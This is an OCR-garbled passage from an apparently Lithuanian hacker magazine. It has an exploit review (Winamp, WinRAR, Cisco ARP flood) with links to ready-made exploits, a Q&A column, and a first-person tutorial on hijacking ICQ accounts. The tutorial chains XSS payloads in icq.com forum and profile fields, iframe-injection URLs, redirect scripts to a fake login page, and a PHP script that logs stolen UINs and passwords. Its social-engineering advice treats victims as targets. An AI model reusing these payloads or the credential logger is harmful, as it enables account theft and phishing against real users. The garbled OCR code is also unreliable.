bia, kad 2006.01.30 išleistoje naujoje 
Winamp 5.13 versijoje kritiškas pažeidžia- 
mumas jau ištaisytas. Manau, tu tikriau- 
siai supranti, apie kokią klaidą čia kalba- 
ma :) 


[Nuorodos] Eksploito išeities tekstus gali 
gauti čia: www.xakep.ru/post/29855/de- 
fault.asp. 


(Blogio įvertinimas ir potencialas] Pa- 
bandykime pafantazuoti, kaip hakeris gali 
išnaudoti šią klaidą. Savaime suprantama, 
pasinaudoti klaida nuotoliniu būdu nepa- 
vyks tai išskirtinai lokalus pažeidžiamu- 
mas. Vis dėlto niekas tau netrukdo panau- 
doti elementarių socialinės inžinerijos me- 
todų ir per ICO įtikinti kokį nors lamerį už- 
krauti tavo atsiųstą grojaraštį su šaunia 
„hacker-trance“ stiliaus muzika arba tie- 
siog šį grojaraštį pateikti populiariame re- 
surse, kur jis būtų visiems prieinamas. 


[Sveikinimai] Idėja ir eksploitas priklau- 
so programuotojui ATmaCA (atmaca(dic- 
gmail.com, www.atmacasoft.com), kuris 
perduoda linkėjimus ir dėkoja savo drau- 
gui Kozan'ui :). 


EKSPLOITŲ APŽVALGA 


WINRAR 3.30 LONG FILENAME BOF 


Aprašymas 

Metas aprašyti dar vieną populiariam 
produktui — WinRAR skirtą eksploi- 
tą. Naujasis pažeidžiamumas leidžia nu 
laužti programą arba sistemoje įvykdyti 
laisvai pasirinktą kodą. Klaida triviali: iš 
daugybės simbolių sudaryta eilutė, kuri 
programai perduodama kaip paramet- 
ras ir vietoje pribaigia WinRAR. Išleis- 
tas eksploitas šį pažeidžiamumą išnau- 
doja per porą sekundžių, generuodamas 
specialią eilutę, 0 po to paleisdamas 
WinRAR. Iš tiesų eksploite nėra nieko 
ypatingo — tiesiog inicializuojama „ne- 
gera“ eilutė, po ko ji perduodama win- 
rar.exe. Remiantis tuo, eksploitas turi 
būti paleistas c:|program fileslwinrar ka- 
taloge. 


[Apsauga] Oficialioje svetainėje apie šį 
pažeidžiamumą jau senai žinoma, todėl 
visos >3.30 versijos nėra pažeidžiamos. 
Siūlyčiau parsisiųsti paskutinę archyvato- 
riaus laidą (3.51). 


[Nuorodos] Visiškai paruoštą naudojimui 
eksploitą galima rasti adresu www.xa- 
kep.ru/post/30076/default.asp 


[Blogio įvertinimas ir potencialas] Ši 


klaida — ne pirma pasitaikiusi per Win- 
RAR kūrimo istoriją. Prieš porą metų bu- 
vo atrastas panašus pažeidžiamumas, 
tačiau pasaulis jį greitai pamiršo. Įverti- 
nus tai, kad privačiuose rateliuose ga- 
rantuotai egzistuoja laisvai pasirinktą ko- 
dą įvykdantis eksploitas (o ne tik užmu- 
šantis archyvatorių), į hakerių taikiklį gali 
patekti daugelis vartotojų. O jeigu dar 
įvertintume tai, kad archyvatorių atnau- 
jins nebent paranojikas, tai šios klaidos 
pasekmės gali būti pakankamai grau- 
džios :). 


[Sveikinimai] Eksploitą sukūrė Trap-Set 
U.H. komandai priklausantys programuo- 
tojai mh pOrtal ir Dr-CephaleX. Kontak- 
tinis pašto adresas: Alpha Program- 
merdLinuxMail.ORG :). 


CISCO AIRONET ARP ATTACK 


[Aprašymas] Kiekvienas sistemų admi- 
nistratorius užtikrintai pasakys, kad „Cis- 
co“ gamina patikimiausius ir saugiau- 
sius įrenginius. Tačiau apie jų saugumą 
reikėtų labai gerai susimąstyti. Be „Cis- 
co“ įrenginiuose pasitaikančių ir opera- 
tyviai užlopomų skylių egzistuoja nauja 
pavojinga klaida, kuri buvo aptikta visai 
neseniai. Ji pasislėpė ARP paketų ap- 
dorojime. Piktavalis įrenginiui gali pa- 
siųsti daugybę suklastotų ARP paketų, 
kurie bus nuolat pridedami į ARP lente- 
lę. Galiausiai „Cisco“ sėkmingai nudvės 
(o tiksliau tai tiesiog bus pradedamas 
blokuoti įeinantis ir išeinantis tinklo srau- 
tas). Atgaivinti įrenginį galima tik jį per- 
krovus arba priverstinai išvalius ARP len- 
telę. 


Eksploitas parašytas su C ir turi viso labo 
tik vieną parametrą maršrutizatoriaus 
IP adresą. Po neilgos pauzės eksploitas 
paleis begalinį ARP paketų generavimo 
ciklą. 


[Apsauga] Apsisaugoti nuo tokio užpuo- 
limo galima tik atnaujinus įrenginio mik- 
roprogramą, kurią galima gauti oficialioje 
gamintojo svetainėje www.cisco.com. 


[Nuorodos] Eksploitą galima pasiimti iš 
čia: www.xakep.ru/post/29813/de- 
fault.asp. Ten pat galima rasti ir techni- 
nių detalių bei skylėtų įrenginių sąrašą. 


[Blogio įvertinimas ir potencialas] 
Naujasis eksploitas mestelėjo krūvą 
problemų ir taip iki kaklo paskendu- 
siems darbuose administratoriams. Da- 
bar jiems teks perprogramuoti įrenginį 
arba po kiekvienos hakerių atakos va- 
lyti ARP lentelę :). 


[Sveikinimai] Pažeidžiamumą surado Eri- 
kas Smitas (2006 metų sausio 12 die- 
ną). Kiek vėliau hakeris slapyvardžiu Pasv 
(pasvninjadgmail.com) sukūrė galingą 
eksploitą. 


PRIEŠ UŽDUODAMAS KLAUSIMĄ 
PAGALVOK! MAN NEVERTA SIŲSTI 
KLAUSIMŲ, VIENAIP AR KITAIP 
SUSIJUSIŲ SU HAKINIMU/KREKI- 
NIMU/FRYKINIMU — TAM SKIRTAS 
„HACK-FAG“, TAIP PAT NEVERTA 
UŽDAVINĖTI AKIVAIZDŽIAI LAME- 
RIŠKŲ KLAUSIMŲ, ATSAKYMUS | 
KURIUOS BENT KIEK NORĖDAMAS 
GALI RASTI IR PATS. AŠ NE TELE- 
PATAS, TODĖL KONKRETIZUOK 
KLAUSIMĄ IR ATSIŲSK KUO 
DAUGIAU INFORMACIJOS. 


pažeidžiamumą. Ar geriau jį panaudoti kompiute- 
rių užgrobimui ar pateikti informaciją bugtrag fo- 
rumuose? 


Labai intymus klausimas, ir kiekvienas pasirenka sau 

optimalų sprendimą. Derėtų prisiminti, kokiu tikslu buvo 

surinkta jūsų tyrėjų komanda. Jeigu tikslas yra tuojau 
pat gaunama nauda ir svaiginantis nesuskaičiuojamų tūks- 
tančių kompiuterių kontrolės jausmas, tuomet atsakymas 
akivaizdus. O jeigu jūs norite iškilti tarptautinėje scenoje, 
tuomet iš karto galima pradėti platinti šią informaciją, jokiu 
būdu nepamirštant paminėti autorinių teisių. Dar labiau iš- 
populiarėti padėtų parašytas eksploitas, kuris žinią apie jū- 
sų kietumą nuneštų iki pačių žemiausių kompiuterių spe- 
cialistų bendruomenės sluoksnių. Jeigu jau jūs nusprendė- 
te kaip reikiant įsitvirtinti tarp saugumo specialistų, reiktų 
atsistoti į (DStake ir F-Secure vietą, tuo pačiu informaciją 
iš pradžių derėtų perduoti programinės įrangos gamintojui. 
Su informacija pateikiamas ir laikas (2-7 dienos), per kurį 
programuotojai spėtų užlopyti skylę prieš tau perduodant 
informaciją į bugtrag. Tuo pačiu tai padeda užmegzti drau- 
giškus santykius su programinės įrangos kūrėjais, kurie vė: 
liau kartais padeda įsidarbinti. 


()) Mes žinomoje Windows programoje aptikome rimtą 


Kokie saugumo dalykai bus įgyvendinti Vista 
sistemoje vartotojų (sisteminių įrašų) atžvilgiu? 


ta daug naujo atneš ir į saugumą. Pasikeis privilegijų 

suteikimo vartotojams sistema. Nebus poreikio nuolat 
dirbti „Administrator“ vardu, kad idiegtum ir dirbtum su spe- 
cialia programine įranga. Saugumas bus valdomas per User 
Account Protection, kurią jau galima rasti naujosios opera- 
cinės sistemos Beta 1 leidime. Taigi tavęs tiesiog papildo- 
mai paklaus leidimo įdiegti programinę įranga. Tokia iš Ma- 
COS pasiskolinta koncepcija taps veiksminga kliūtimi spy- 
ware ir adware parazitams, nors ir užims šiek tiek daugiau 
vartotojo laiko. Taip pat kiekvienas vartotojas turės savo Vir- 
tual Store saugyklą, į kurią bus dedami visi sistemos pakei- 
timai rašymai į sisteminį registrą ir į apriboto priėjimo 
particijas pridėta informacija, kurie buvo atlikti konkretaus 
vartotojo darbo metu. Taigi visus sistemos pasikeitimus tu- 
rėtų pajausti pats vartotojas. Savaime suprantama, gali at- 
sirasti ir naujų dalykėlių bei niuansų, kurie paaiškės po to, 
kai šviežesnės naujosios sistemos RC versijos pateks į ilga- 
pirštes testuotojų rankas. 


Nepaisant to, jog pagrindinis naujosios sistemos devi- 
zas — vartojimo ir darbo su informacija patogumas, Vis- 


Ar išleidus IE7 bus išspręstos senos problemos? 


Derėtų pastebėti, kad iki šiol platinta Beta 1 saugumo 


atžvilgiu neatnešė kažko itin naujo. Manoma, kad Beta 
2 versijoje bus įdiegtos anti-phishing priemonės, ku- 


rios bus panašios į AOL Netscape 8. Protected Mode 
parodys, kad iexplore.exe negali daryti visur ir visko, net jei- 
gu jis buvo įtrauktas į ugniasienės „Patikimųjų“ sąrašą. At- 
skiriems veiksmams reikės papildomo vartotojo patvirtini- 
mo; taip bus galima atmesti daugybę parazitų, kurie tik Ir 
veržiasi patekti į tavo sistemą. Naudojant toki sprendimą, 
pagrindinis dalykas bus psichologinis vartotojų apdorojimas, 
kurie turėtų daugiau dėmesio skirti sistemos saugumo per- 


spėjimams. 


Kokia XP SP3 ir Vista išleidimo tvarka? 
Kuris iš jų dviejų bus saugesnis? 


Visų pirma, susigaudyti išleidimo tvarkoje, jeigu tokia 

kada nors iš viso MS egzistavo, praktiškai neįmano- 

ma. Antra, kas bus saugesnis gali parodyti tik prakti- 

ka; šios kontoros išleidžiamų produktų nenuspėjamu- 
mas akivaizdus. Mano nuomone, SP3 bus mažiau pavo: 
jingas, kadangi tai bus jau gerai išstudijuotai platformai 
skirtas pataisymų paketas; nesinori tikėti, kad SP3 bus 
visa ko pakeitimas a la SP2. O Vista gali tapti juoduoju 
arkliuku, kurio saugumą teks didinti rankiniu būdu. Dabar- 
tinė situacija tokia, jog iš pradžių, 2006 metų antroje pu- 
sėje, išeis Vista. Po to, greičiausiai antroje 2007 metų 
pusėje, bus išleistas trečiasis XP pataisymų paketas. Ne- 
apibrėžtumo prideda ir ankstesni šios įmonės atstovų pa- 
reiškimai, kuomet Styvas Balmeris prisiekinėjo ir žegnojosi 
SP pateikti dar prieš Longhorn išleidimą. 


Ko dar naujo galima tikėtis iš 
Vista sistemos? Kaip ji mus apsaugos? 


Windows 2003 sistemoje atsiradusi NAP sistema, kuri 
šifruojama kaip Network Access Protection, bus įdiegta 
ir Vista sistemoje. NAP kažkuo primena Cisco Network 
Access Control Program, kuri apibrėžia klientų sistemų 
priėjimo prie interneto reikalavimus dar prieš jų prijungimą. 
Pavyzdžiui, čia galima reikalauti tam tikrų būtinų pataisy- 
mų, įvesti privalomą įdiegtos programinės įrangos sąrašą, 
apibrėžti antiviruso bazės šviežumą. Iš tiesų sistema gali- 
ma reikalauti ko tik nori. Šviesiausia sistemos ateitis — 
klientas-NAP tipo sąsajos įdiegimas tiekėjų lygyje taip, kad 
į intemetą nepatektų žmonės su neapsaugotais kompiute- 
riais (t.y. potencialūs užkratų ir trojanų platintojai). Dabar 
sisteminė ugniasienė sėkmingai filtruos išeinanti tinklo srau- 
tą. Ji analizuos visą įdiegtą programinę įrangą, iš pradžių 
suprasdama, kokiais konkrečiais tinklo resursais (pavyzdžiui, 
TCP jungtimis) programa naudojasi; visas kitas aktyvumas į 
Interneto pusę bus ribojamas. EFS šifravimo sistema bus 
toliau plėtojama, taip pat bus integruotas malware skene- 
nis, turintis tolimesnio problemų pašalinimo galimybę. 


Kas tai yra securelevel ir kuo jis naudingas? 


Securelevel — sąvoka, aptinkama BSD ir Linux siste: 
() mose. Securelevel leidžia keisti saugumo lygį ir reakci- 


ją į įvairius sistemos iškvietimus (calls). Kuo aukštes- 

nis lygis, tuo atitinkamai rimtesni apribojimai. Apriboji- 
mus galima aprašyti rankiniu būdu, modifikuojant siste 
mines bylas. Tuo pačiu atmink, jog pingvino nustatymai 
skiriasi nuo BSD konfigūravimo. Galima rinktis jau paruoš- 
tą sprendimą — du skirtingus pagrindinius lygius secure- 
level 1 ir securelevel 2 (yra ir nulinis lygis, kuris reiškia, jog, 
ši sistema atjungta). Išsamiau su šiais dalykais galima su- 
sipažinti adresu http://www.openbsd.org/cgi-bin, 
man.cgi?guery=securelevel. Derėtų pastebeti, kad BSD 
po truputį atsisako aprašytos idėjos ir, pavyzdžiui, nebelo: 
po skylių. Po to, kai OpenBSD sistemoje buvo aptiktas 
paskutinis pažeidžiamumas, kūrėjai oficialiai atsisakė iš- 
spręsti šią problemą. 


mas nesinaudos, tačiau niekaip negaliu atjungti pa- 
gal nutylėjimą aktyvuotos ugniasienės. 


()) Sukonfigūravau lokalų serverį, kuriuo niekas sveti- 


(O) Paprasčiausias sprendimas būtų ugniasienę įjungti, kad 


sistema neverktų, jog jos nėra. O įmontuotoje ugniasie- 

nėje gali paprasčiausiai aktyvuoti opciją allow everyt- 
hing (praleisti viską), kuri tau atvers visas jungtis ir padarys 
tave prieinamą kaip provincijos nimiomanę 2. 
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HACK 
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ČIŲ SVETAINIŲ YRA PAŽEIDŽIAMOS,, IR NE- 
BŪTINAI TAI YRA PAPRASTI ŽMONIŲ NAMŲ 
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NISTRATORIAI IR IŠMOKO APSAUGOTI SA- 
VO KŪRINIUS NUO PHP INCLUDE'Ų IR SOL 
INJEKCIJŲ, CSS SKYLĖS KAIP BUVO, TAIP 


K TODĖL, KAD DAU- 


GELIO KVAILŲ ADMINŲ NUOMONE PER CSS 


EKO RIMTO. TIKIUO- 


SI, KAD MANO ŠIANDIENINIS STRAIPSNIS 
ISSKLAIDYS TOKIĄ SUSIDARIUSIĄ NUOMO- 


NĘ. AS PAPASAKOS 
NĖS KLAIDAS 


SCENA 


Kaip aš grobiu UIN 


U, KAIP GROBIU Ul- 


N*US, IŠNAUDODAMAS /CO.COM SVETAI- 


us 


išnaudodamas „icą 


, 
„com“ skyles 


[Intro] Tai buvo iš tiesų sėkminga savaitė: są! injekcija 
vienoje iš NASA svetainių, phrack.org skylės ir dar dau- 
gybė surastų vaizduotę užburiančių pažeidžiamumų. Štai 


koks įkvėpimas užpuola žmo; 


Taigi, kaip bebūtų keista, ši 
sėdėjau ir studijavau naujai 
ko persimečiau prie klaidų 


UNIXOID 


'gų, kai visa jo šeima savai- 


tei išvažiuoja į užmiesčio vilą. Kitaip tariant, hakeriui tai 
tikrų tikriausias kūrybinis rojus :). 


istorija prasidėjo naktį. Aš 
įdiegtą icą klientą gip, po 
paieškų pagrindiniame visų 


ICO vartotojų serveryje — icg.com. Tiesą sakant, ruo- 


šiausi tai padaryti jau senai, 
pažinties su nauju klientu. 


[CSS per ICO klientą] CO 


CODING 


tačiau pradėjau būtent po 


svetainėje galima peržiūrėti 


bet kurio sistemoje užsiregistravusio vartotojo profilį. Tuo 
pačiu galima peržiūrėti jo avatarą, asmeninius duome- 
nis ir net išsiųsti jam pranešimą. Manau, tu tai žinai. 


Pavyzdžiui, mano buvusio UIN'0o 559822 profilis yra šiuo 


adresu: www.icą.com/whitepages/wwp.php?to =559 


822. Besikapstant kliente, man dingtelėjo mintis: o ką, 
jeigu šiame puslapyje realizuočiau intersaitinį skriptini- 
mą? Klausimas: „Kaip?“. Atsakymas: „Labai papras- 
tai“. Kliento vartotojo nustatymuose įvedame duome- 
nis, jie užkraunami svetainėje ir atvaizduojami (suvei- 
kia) profilio svetainėje. Iš esmės viskas labai lengva, 


UNITS 


bet paaiškėjo, kad čia pažeidžiami tik du parametrai: 
„Vardas“ ir „Pavardė“. Atmesime „Slapyvardžio“ lauką: 


„IK 


Jis mums neįdomus :). Bet čia tenka susidurti su dar viena ne- 
sėkme: įvedamų simbolių kiekis yra ribojamas. Dėl to, pavyz- 
džiui, norint pavaizduoti lokalų perspėjimą, teko pasinaudoti tuo 
metodu, kurį tu gali matyti pirmojoje nuotraukoje, t.y. pirmąją 
elementaraus skripto dalį įrašyti į „Vardo“ lauką, o pabaigą įkur- 
dinti „Pavardės“ lauke. 

Atrodytų, ką čia dar sugalvosi, kai esi taip apribotas. Tačiau 
man pavyko surasti dar vieną pažeidžiamą parametrą, kuriame 
įvedamų simbolių skaičius siekia net 80 — tai „Namų svetai- 
nė“. Tiesa, su šiuo parametru elkis atsargiau: aš taip užbani- 
nau keletą UIN'ų. Tiesa, visiškai įmanoma, kad tai ne banas, 0 
tiesiog gip eina iš proto. Tiksliai nežinau, tačiau UIN'ai iškeliavo 
Anapilin :(. 


Kam tai galima panaudoti? Pavyzdžiui, užgrobti svetimus UIN'us 
arba kraštutiniu atveju galima kaip reikiant pašmaikštauti. Tar- 
kim, galima nuosavame profilyje įrašyti nukreipimą (redirect) į 
savo svetainę ir juoktis iš nustebusių žmonių, kurie užėjo pažiū- 
tėti į tavo profilį :). Pas mane būtent taip ir padaryta, gali pasi- 
mėgauti: www.icą.com/whitepages/wwp.php?to=559822. 


Įleg.com“ svetainės forumo skylės] Mums labai pasisekė, 
kad praktiškai visi icg.com servisai veikia viename subdomene. Iš 
to išplaukia, kad tikimybė surasti tinkamą skylę ir užgrobti sveti- 
mus sausainukus pastebimai išauga :). . 

Tęsdamas savo tyrinėjimus, aš užėjau į forumą. Čia naudojama 
labai paprasta autorizacija, kas mane smarkiai nudžiugino. No- 


tint autorizuotis, į „Login“ lauką reikia įvesti savo UIN'ą arba 
pirminį elektroninio pašto adresą (primary e mail), o „Slapta- 
žodžio“ lauke — savo UIN'o slaptažodį (kuris, kaip tu pats su- 
pranti, labai dažnai tinka ir pirminio pašto adreso dėžutei). Da- 
bar telieka forume surasti CSS skylę. 

Pasakysiu sąžiningai, po pirmojo CSS testo aš vos nenumiriau 
iš juoko. Net nespėjau pasikapstyti po bb tagus, 0 pažeidžia 
mas parametras jau buvo surastas. Juo pasirodė besąs atsaky- 
mui į temą skirtas laukas „Subject“. Preview režime niekas ne- 
buvo filtruojama, kas iš karto žadėjo dideles galimybes. Ant sa- 
vęs patikrinęs sudaryto skripto eksploito (kol kas lokalaus) vei- 
kimą: “> <script>alert(document. cookie) < /script>, patenkin- 
tas išsišiepiau. 

Taip aš įsitikinau, kad viskas vyksta pakankamai sekmingai. Vis 
dėlto galutinai išsiuntęs pranešimą ir peržiūrėjęs puslapio išei- 
ties tekstą aš pamačiau, kad čia filtruojami visi slešai ir dvigu- 
bos kabutės: 


tillo y sile84447;1 


script 


"Bguot; > < saipt srC 


Eavol;šgt;8ltseipt src 


btp:8 47,84 
hitp://my si 


Planai sugriuvo. Viskas, ką čia galima padaryti -— tai įterpti per- 
spėjimą, pavyzdžiui: <img src=javascript:alert('Mes jega!')>, 
tačiau nieko rimtesnio iš to neišspausi. Nepadėjo nė bandymai 
apeiti filtravimą ir skirtingi slešo bei kabučių perkodavimai. 


[Nauja galimybė] Čia aš pastebėjau vieną dalykėlį: jeigu pa- 
spaudi savo žinutės pavadinimą arba peržiūri visų savo siųstų 
žinučių sąrašą, tai gali pamatyti įterptą CSS. Manęs tai neten- 
kino, juo labiau kad antrasis pranešimo antraštės parametras 
buvo pilnai filtruojamas, todėl virš savo slapyvardžio aš mačiau 
atvaizduotą skriptą, ant kurio ir reikėjo spausti :). 

Teko pradėti kitų pažeidžiamumų paieškas. Palikęs ramybėje 
„Atsakyti į tema cituojant“, aš nuspaudžiau mygtuką „Pradėti 
naują temą“. Štai čia (preview režime) Subject/Ouestion laukė 
neveikė nė vienas skriptas, viskas buvo žiauriai filtruojama. Šiek 
tiek nusiminęs aš vis dėlto sukūriau ir išsiunčiau temą. Visų 
temų sąraše aš pamačiau, kad mano skriptas aiškiai išsiduo- 
da. Ką gi, filtrai iš tiesų veikia. 

Aš automatiškai spustelėjau ant temos, prasidėjo krovimas, ir, 
o stebukle: — skriptas veikė! Temos viduje nebuvo jokių filtrų, o 
reikiamas aktyvus CSS buvo surastas. Be abejo, labai nervino 
tai, kad temų sąraše maniškė išsiduodavo, kadangi jos pavadi 
nimas buvo mano skriptinis eksploitas. Deja, čia jau nieko ne- 
padarysi, juk net pakeitus jo koduotę ir taip siekiant bent šiek 
tiek supainioti vartotoją, skriptas temos pavadinime vis tiek ne- 
norėjo veikti. 

Štai koks įdomus filtravimas ir kokie kvaili adminai. Bet, kaip tu 
tikriausiai supranti, vogti sausainukus (cookies) nėra prasmės, 
kadangi atviru pavidalu mes gauname tik uin'ą (primary) ir sla- 
pyvardį, bet ne slaptažodį, o išgauti jį, pavyzdžiui, iš sesijos, 
nėra realu, kadangi greičiausiai jos identifikatorius su slaptažo- 
džiu niekaip nesusijęs. 

Galima būtų paeksperimentuoti su svetimų sausainukų pakiši 
mu (jeigu netyčia tikro vartotojo IP adresas nebūtų susietas su 
sesija), tačiau ši idėja manęs neįkvėpė net eksperimentui. Vie 
nintelis dalykas, kurį aš galėjau gauti tai priėjimas prie sveti- 
mo asmens forumo vartotojo, t. y. aš galėjau siųsti pranešimus 
kito vartotojo vardu. Kaip nors sužinoti arba pakeisti slaptažodį 
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informaciją per profilį buvo neįmanoma, todėl aš pasukau kitu 
keliu — link tiesioginio slaptažodžių vogimo per suklastotus au- 
torizacijos puslapius. 


ĮSocialinė inžinerija + CSS] Kaip matai, į forumą įkeltas mū- 
sų skriptas labai išsiduoda, kas šiek tiek sujaukia mūsų planus 
(bet net nepaisant to man sekėsi, ir uin'ai patys lipo į mano 
rankas :)). Tačiau nenuleisk rankų, juk kas tau sukliudys tiesiog 
į forumą įdėti nuorodą ir taip priversti vartotoją ją aplankyti arba 
forumo dalyviui išsiųsti pranešimą su šia nuoroda. Vis dėlto 
atmink, kad rezultatas visiškai priklauso tik nuo tavęs, kadangi 
čia be gerų socialinės inžinerijos įgūdžių neapsieisi. Kenksmin- 
gus skriptus taip pat galima įrašyti į savo profilį, o po to tiesiog 
keliauti po forumą ir išdykauti. Prieš užbaninant uin'ą, į tavo 
profilį žvilgtelės mažiausiai 5 vartotojai iš 10 :). 


[„Flash-CSS“ ataka] Kartais pasitelkus standartinius metodus 
įwykdyti CSS atakos neįmanoma. Tokiu atveju tau gali padėti 
labai paprastas ir įdomus būdas. Aš kalbu apie Flash ataką. 
Tam tu turėsi Flash redaktoriuje sukurti kokį nors paveiksliuką ir 
| getURL parametrą per pasyvų CSS įrašyti nuorodą, pavyzdžiui, 
su nukreipimu į suklastotą puslapį (žr. nuotrauką). Po to | Sub- 
Jject lauką reikia įrašyti: <embed src=http://my. site/1.swf>. 


Pamiršau pasakyti. kad siunčiant pranešimą šalia tavo avataro 
yra 2 nuorodos, viena iš kurių veda į pačioje straipsnio pradžio- 
je nurodytą profilį. o kita — į maždaug šiuo adresu esantį pro- 
fil: www.icą.com/whitepages/about me.php?uin=559822. Sa- 
vaime suprantama, šis profilis taip pat skylėtas :). 


[Idėja ir tolimesni tyrimai] Mano idėja yra tokia: į forumą įde- 
dame pranešimą su skriptu, kuris vartotoją dėl CSS poveikio 
nukreipia | puslapį su mano svetainėje esančia klastote, kuri 
atrodo kaip pagrindinis forumo autorizacijos puslapis. Vartoto- 
Jas įveda savo duomenis ir vėl patenka į forumą, o visi jo įvesti 
duomenys išsaugomi pas mane. Tiesa, viena yra pasakyti... Juk 
vartotojas iš karto supras apgaulę, jeigu naršyklės adreso eilu- 
teje puikuosis kas nors panašaus į http//mad- 
panther.hacker.h15.ru/fake.php. Čia galima buvo pasirinkti du 
kelius: arba apgaulei panaudoti url spoofing, arba surasti dar 
vieną pasyvų pažeidžiamumą (pageidautina forumo autorizaci- 
Jos puslapyje) ir į jį įmontuoti frame, per kurį būtų atvaizduoja- 
mas mano suklastotas puslapis. 

Aš nubėgau į visą parą dirbančią parduotuvę ir nusipirkau porą 
buteliukų alaus, po ko pradėjau ieškoti naujų CSS. Praėjo vos 
15 minučių, o aš jau buvau suradęs 3 pasyvius pažeidžiamu- 


yw.lnuxsueks.or; pranešimų siuntimo forma 


mus, vienas iš kurių buvo būtent autorizacijos puslapyje. Štai jo 
url su jau įmontuotu pavojingu skriptu: 


vuwicą conVkarm/login  poge.plp?do 
st htp063A052F062Fwww.icą.tom662Fb 
cards*62FRsv= 28css= boards.s" > < Ifia 
me?620sc— http://my. site/login.php?620 
height 100959620widhh= 100960420scr0ll 
ing =no0420fameborder 07 


O dabar, užšifravę labiausiai mus išduodančius elementus į url 
koduotę, gauname: 


wwicą.cam/korma/legin page. php?dės 
1--hipo63A062F042 Fw. icą.comK2Fboa 
1ds062FRs1= 2Ress — boards ss96270h3E 

"43Cihame?62520srcP63Dhp?KBAPK2FOK 

2Fmy site962Flogin.php062520height043. 
D1009625962520vidth?63D1 000625 


Kaip matai, aš sukūriau iframe, kuriame bus atvaizduojamas 
mūsų suklastotas puslapis, esantis mano svetainėje, bet... pa- 
sirodo, jog šiame puslapyje (www.icą.com/karma/login pa- 
ge.php) yra net 3 pažeidžiami parametrai, o tai reiškia, kad 
mes matysime visus tris 100 96 iframe'us, pavaizduotus iš vir- 
šaus į apačią. Be abejo, tai pastebės toli gražu ne visi, tačiau 
nenorint rizikuoti, teko imtis kito pažeidžiamumo, esančio foru- 
mo paieškoje: 

winiitą,conVicą. prelerences/ią. preview php?sią — < saipt > alan(doaument. cookie) < /stipt > 
Čia manęs taip pat laukė nesėkmė — buvo ribojamas įvedamų 
simbolių skaičius. Dėl to aš apsistojau ties 3 CSS. Štai jo ur! su 
jau suformuotu iframe. Vėlgi užšifravę visus negražius ir mus 
išduodančius dalykus, gauname: 


www.lcg.com/icą  prelerences/sių pre 
view. php?sių = ?63Cifiame + si0630htip!k 
3A062F962Fmy. site962Flogin.php + heigh 
1863D100625 + widih?630100V625 + sell 
ing =n0 + frameborder= 063E 
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mano klastote, atvaizduota per iframe 


Ares 9) hktpi[/vmw.icą.cor|login.php 
in Page -ICO... | HackZona- T 


kicąboards-—- 


Meet People | 


ICO Homepage 


y do 
5 a sv 
ais S 
"our ICO Password: bessas Need ai 
I] Remember me More Inio> Papa 


mano Klastotė, panaudojant! url-spoofing 


Viskas pavyko sėkmingai, skriptas tik šiek tiek išsiduoda pusla- 
plo pavadinime, tačiau iš esmės viskas tiesiog puiku. 

Bendram išsilavinimui aš nusprendžiau peržiūrėti dar vieną ap- 
gaulės variantą — url spoofing. Ši idėja tau neturėtų sukelti 
didelių sunkumų, kadangi apie tau jau buvo rašyta mūsų žurna- 
Ie (J[.10, 2004 kovo mėnesio numeryje, straipsnyje „Tavo pa- 
što dėžė nulaužta!“). Norint įgyvendinti mūsų sumanymą, reikia 
padaryti taip, kad aukos naršyklėje suveiktų štai toks kodas: 


stript > lacation.href=unescape((htip:/Avww.icą com | login. phpO601 Dwww.my. site/ 
login.php');< Acript> 


Naršyklė turėtų būti neatnaujintas IE. Deja, pirmame skripto 
adrese negalima naudoti slešų, todėl teko tenkintis vertikaliu 
brūkšniu. Galbūt tu sugalvosi ką nors gražesnio :). 


[0 dabar apie pačią klastotę] Čia nėra nieko sudėtingo. Tie- 
siog į diską išsaugome autorizacijos puslapi ir šiek tiek jį patai- 
some, tiksliau šnekant — pakeičiame action parametrą, vieto- 
Je www.icą.com/karma/login.php nurodydami savo bylą 
check.php. Pati check.php atrodo štai taip: 


check.php 

"php 
Sip —fopen("log.html", “a"); // logi tim 
Ranite(Sfp, “Šuin email : Spassword < br/ >"); // 
Idlose(Sfp); // 
Koader("lacation:http://icą.com/boards/"); //. 
1> 


Mame 
Nick Name Surnamė 
PinkPanther script alertį Kserpb 


Pav.1; Elemeniarus įvedamų simbalių kiekį tikrinančio filtro apėjimės 


Dabar šias dvi bylas bei logi.htm! perkeliame į svetainę su php 
palaikymu (šiuo atveju tai mano svetainė — my site). Štai ir 
viskas, klastotė paruošta! Tik nepamiršk su chmod nurodyti tei- 
singu teisių. 


[Viską sujungiame į vieną visumą] Kadangi pažeidžiamas 
parametras Subject/Ouestion nepriėmė daugiau nei 55 simbo- 
lius, teko imtis dar vienos gudrybės. Forume aš sukūriau temą 
su antrašte “><script src= "http://my site/1.js" > </script>. Po 
to sukūriau bylą 1.js, į kurią įrašiau štai tokią eilutę: 


location. hrel = unescape(/htp://nwvcicą com | login php060) GDyww.my. ste/login php); 
arba darbui su iframe: 


locatiūn.brel ="http://rww.icą.comvicą. preforences/sią pre 
Viaw.php?sią = o3Ciframe + src?630http?034962F062Fmy. si 
1e962Hlogin.php -- heighi963D1 009425 + widihYk3D1009425 + 5 
crolliną = no > frameborder = 0063F; 


Forume įdėtas eksploitas iš mano svetainės krovė skriptą 1.js, 
kuris visus šiame forumo puslapyje esančius vartotojus nukreip- 
davo į mano suklastotą puslapį. Vartotojas-auka pagalvodavo, 
jog tai kokia nors forumo Klaida, ir iš naujo autorizuodavosi, tuo 
pačiu išsiusdamas man savo uin'us/primary ir slaptažodžius, po 
ko sugrįždavo atgal į forumą, lyg nieko nebūtų nutikę. 

Štai ir viskas. Kita užduotis — kaip pas save išlaikyti Už- 
grobtus uin'us, kurių slaptažodžiai žinomi. Tačiau tai jau juo- 
kų darbas :). 


[Labiausiai skylėta metų svetainė :)] Kol aš rašiau straipsnį, 
uždaruose ir viešuose antichat'o skyriuose prasidėjo globali 
icg.com klaidų paieška, ir dabar ten galima rasti labai įdomių 
dalykėlių (daugybę paswių CSS, icą paštą leidžiančių perimti 
skylių ir t.t.), Tuo metu, kai straipsnis jau buvo parašytas, icą.com 
svetainėje aš suradau dar keletą CSS. Taigi daryk išvadas Ir 
tyrinėk toliau. 


(K A M UE ua 
+) http: Įm ką. conboards/post. sg.pho 
SOPYM povet.| AomeliSkiba | Rephylo Nice ste 


sa: Ispo 19) iesčans: I 
reat site, Dumbass. 11 be certain to spread it a0und to al of other atheist Inends. || 
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Pav.2: Skriptas pažekižiamame lauko 


Pav.3: Mano sausainukai visu gražumu 
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FERRUM 


040 


Forumų karo išvados 


SUNKU BŪTŲ NEPASTEBĖTI, KAD DIDŽIOJI 
ŠIANDIENOS ĮSILAUŽIMŲ DALIS ATLIEKAMA 
